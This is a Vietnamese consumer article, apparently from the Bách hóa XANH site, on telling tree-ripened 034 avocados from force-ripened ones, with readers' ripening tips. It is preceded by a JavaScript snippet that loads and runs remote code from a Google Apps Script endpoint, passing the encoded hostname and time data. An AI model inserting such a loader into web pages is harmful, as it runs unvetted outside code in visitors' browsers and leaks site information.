var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cô gái chia sẻ cách nhận biết bơ già chín cây thu hút ngàn bình luận

Bơ là một loại trái cây mang một nguồn dinh dưỡng dồi dào và thường luôn được nhiều người ‘săn đón’ mỗi khi tới mùa. Tuy nhiên việc mua bơ sao cho ngon cũng không phải là chuyện dễ. Cùng Bách hóa XANH xem chia sẻ của một cô gái về cách nhận biết bơ già và ngon nhé!

Cách lựa chọn bơ sao cho mua được những trái già, thơm ngon hấp dẫn cho mùa bơ đang đến gần sẽ là một trong những ‘bí kíp’ mà hội chị em nội trợ cần ‘bỏ túi’ ngay. Một cô gái có tên tài khoản là Lê Thanh Vân mới đây cũng đã chia sẻ lên mạng xã hội cách để nhận biết bơ già chín cây áp dụng với bơ 034 rất hay. Cùng Bách hóa XANH khám phá ngay sau đây!

1Sự khác nhau giữa bơ già chín cây và bơ chín ép

Theo cô gái này chia sẻ: “Bơ già 1 là trái bơ tự rụng khỏi cây, ngày hôm sau sẽ chín. Bơ già 2 thì sau khi hái xuống sẽ tự chín mà không cần xài chiêu – và nó chín từ dưới lên. Bơ già 3 là sau khi hái xuống xài chút chiêu (ngâm nước, phủ khăn ẩm) thì bơ sẽ chín để ăn – loại này chín từ trên xuống. Bơ già 4 là loại chín héo – cố ăn để biết vị đắng cuộc đời”.

Sự khác nhau giữa bơ già chín cây và bơ chín ép

Cô còn giải thích thêm lý do vì sao bơ chưa chín vẫn được thu hoạch là vì bơ cũng như nhiều trái cây khác, cắt sớm sẽ nặng ký hơn rất nhiều, lại khỏe cho cây đỡ mất sức vì dưỡng trái lâu. Ngoài ra còn đảm bảo bơ lâu hư hơn khi bán chậm hoặc sẽ dễ hơn nếu cần vận chuyển đi xa.

2Cách nhận biết bơ già chín cây và bơ chín ép

Khi mua bơ, bạn cần phân biệt được đâu là bơ già và bơ non vì bơ phải già mới ngon, mới dẻo, mới béo một cách ngon nhất. Nhưng không phải bất cứ khi nào bạn ra chợ hay vào siêu thị cũng chọn được bơ như ý.

Khi lựa chọn bơ, cô gái chia sẻ về cách nhìn hình dáng bên ngoài của chúng, đặc biệt là ở phần đầu trái bơ. Cô cho biết: “Phần đầu của trái bơ già có da láng, đốm trắng mịn, cảm giác chìm dưới vỏ xanh. Còn đối với những trái bơ chưa già thì có lớp bên ngoài hơi sần, không căng mịn“.

Cách nhận biết bơ già chín cây và bơ chín ép

Ngoài ra, bạn cũng có thể phân biệt được bơ già thông qua phần đít bơ. Bơ già thì đít bơ phải căng phồng, không nhăn. Trái càng già và gần như chín cây sẽ có phần đít dưới căng phồng ra.

Cách nhận biết bơ già chín cây và bơ chín ép

Không những thế, có nhiều người khác cũng ‘góp vui’ với những chia sẻ và trải nghiệm của chính bản thân họ trong quá trình mua bơ.

“Ủa, cách đơn giản nhất là chỉ cần lắc trái bơ nghe hột nó rung là được chứ nhỉ? Đâu cần phải nhận biết bên ngoài. Nhà mình gần 1 hecta bơ, mỗi lần thu hoạch đều làm như vậy”, theo chia sẻ của bạn Gia Bảo.

Nói về cách bảo quản bơ được chín đều, một chị có tên Ruby Hoàng cho biết: “Bơ ngâm nước không phải là do bơ chưa đủ độ già mà là do bơ khi đóng thùng vận chuyển đi thường bị sốc nhiệt làm bơ bị mất nước dẫn tới héo, chai cứng, chín không đều, thối đầu. Vì vậy để có những quả bơ chín ngon thì sau khi nhận được bơ để ra rổ khoảng 15 phút, sau đó ngâm bơ 15 đến 30 phút rồi xếp bơ vào rổ thoáng, ngày xịt nước trực tiếp lên quả bơ từ 3-5 lần để cung cấp đủ nước cho bơ, bơ sẽ chín tự nhiên đều, đẹp, ngon.”

Cách nhận biết bơ già chín cây và bơ chín ép

Có chia sẻ khác của chị Dương Thủy cho rằng: “Riêng đối với loại bơ 034 sau khi hái về phải ngâm qua nước muối loãng sạch khoảng 30 phút rồi vớt ra để ráo thì nó mới chín đều cả trái.”

Còn theo một chị có tên Oải Hương cho hay: “Thật ra do bơ bị mất nước nên khô và chín không đều. Với thời tiết nắng nóng này người con héo nữa là bơ. Mình ở Daklak mỗi lần bơ rụng xuống gốc đều chạy ra nhặt, rửa sạch, ủ thùng gạo mấy hôm mới chín. Quan trọng vẫn là cách giữ và ủ bơ cho chín đều.”

Ngoài ra, có một số bình luận khác cũng chia sẻ về việc nếu bơ chín không đều mọi người cứ cắt phần chín ăn, phần chưa chín thì bọc lại đợi chín rồi ăn sau.

Nếu bơ chín không đều mọi người cứ cắt phần chín ăn, phần chưa chín thì bọc lại đợi chín rồi ăn sau

Quả thật, để lựa chọn được những trái bơ ưng ý, thơm ngon không phải là chuyện đơn giản nhỉ?! Nếu bạn cũng có những kinh nghiệm trong việc mua bơ thì đừng ngần ngại chia sẻ với Bách hóa XANH về cách chọn bơ của riêng bạn nhé!

Bách hóa XANH mong rằng với bài viết tổng hợp trên, bạn đã có thêm cho chính mình những kiến thức bổ ích để có thể chọn được những trái bơ ưng ý, ngon lành nhất nha!

Mua trái cây tươi ngon tại Bách Hóa XANH:

Kinh nghiệm hay Bách Hóa XANH